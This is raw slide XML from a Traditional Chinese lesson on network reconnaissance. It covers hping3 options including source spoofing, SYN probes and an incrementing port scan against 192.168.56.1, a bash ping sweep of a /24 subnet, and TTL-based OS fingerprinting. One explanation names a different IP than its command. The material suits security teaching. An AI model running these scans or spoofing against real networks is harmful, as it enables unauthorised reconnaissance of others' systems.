                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-a  --spoof      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>spoof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> source address</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-S  --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>syn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>        set SYN flag</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-p  --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>destport</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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6830807"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3235665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內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="212757" y="507077"/>
            <a:ext cx="8580507" cy="2136371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149679" y="3005818"/>
            <a:ext cx="8727621" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> hping3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.56.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-p 80 -c 3 -n -S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個命令將發送一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP 192.168.0.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>端口，以查看它是否處於開啟狀態。如果成功，將收到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TCP SYN/ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回應。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-c 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：指定發送的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請求數量，這裡是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>解析，以避免進行主機名查找，加快掃描速度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TCP SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>掃描技術，向目標主機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>端口發送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>RA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>沒開 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及類 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>操作系統 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回顯回應的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TTL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字段值為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Compaq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Tru64 5.0 ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回顯回應的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TTL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字段值為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>     微軟 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows NT/2K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>操作系統 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回顯回應的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TTL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字段值為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>     微軟 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows 95 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>操作系統 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回顯回應的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TTL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字段值為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圓角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2618855" y="893139"/>
            <a:ext cx="809625" cy="2665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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4414578" y="893139"/>
            <a:ext cx="898071" cy="2665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85254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字方塊 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2428875"/>
            <a:ext cx="9144000" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in {1..254}; do (ping -c 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.56.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>i | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> "bytes from" &amp;); done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in {1..254};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：這部分建立了一個循環，它將變數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的值從 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>遞增到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>254</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，因此循環將運行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>254</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>次。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：開始循環的主體。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(ping -c 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>i | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> "bytes from" &amp;);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：這是循環的內容。對於每個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，它執行以下操作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping -c 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：執行一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令，嘗試連接到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>地址 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的主機。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-c 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示只發送一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回應請求（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：管道符號，將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的輸出（標準輸出）傳遞給下一個命令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> "bytes from"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：用於過濾 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令的輸出，僅保留包含 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"bytes from" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使每個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令在後台運行，以確保快速執行。這允許同時發送多個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </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 y="808471"/>
            <a:ext cx="9144000" cy="1147782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2230540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85799" y="4853285"/>
            <a:ext cx="7715250" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> hping3 -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>192.168.56.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>-p ++75 -c 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
